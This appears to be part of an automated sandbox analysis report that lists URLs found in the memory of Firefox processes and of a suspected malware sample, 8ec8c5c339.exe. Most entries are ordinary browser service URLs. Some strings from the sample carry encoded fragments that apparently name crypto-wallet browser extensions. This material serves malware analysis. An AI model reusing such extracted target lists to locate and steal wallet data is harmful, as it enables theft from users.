Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.combrowser.fixup.alternate.enabledPanelUI-developer-tools-viewWebChannelMes
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000023.00000002.3326407807.0000028631538000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3336295224.0000028631E45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339121279.00000286320B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/isUnderHiddenEmbedderElement
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/isUnderHiddenEmbedderElementpictureinpicture
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.combrowser.handlers.migrationsaccount-connection-connectednetwork.proxy.
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comzA8
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3334627067.0000028631DB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelbrowser.engagement.session_time_including_suspen
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelchrome://extensions/content/schemas/manifest.jso
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/ContentPrefServiceChild.sys
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.orgmedia.autoplay.blocking_policy_migrateXULStoreForDocumentbookmarksToolbar
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.orgmigrateXULAttributeToStyletestPermissionFromPrincipalcreateContentPrincip
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 00000008.00000003.2415301062.00000000229F1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://svgwg.org/svg2-draft/struct.html#SymbolNotes:
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com(7O
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/mathml-core/#dfn-maction
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/mathml-core/#dfn-semantics
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/mathml-core/#the-mathvariant-attribute
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/schemas/notifications
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://a581a2f1-688c-434b-8db8-16166b199
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000023.00000003.2833188237.000002863208E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.certificate-transparency.org/what-is-ct
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3193026235.000002862DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/2
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchpictureinpicture
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchwikipedia
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000023.00000002.3306154976.000002862E86B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
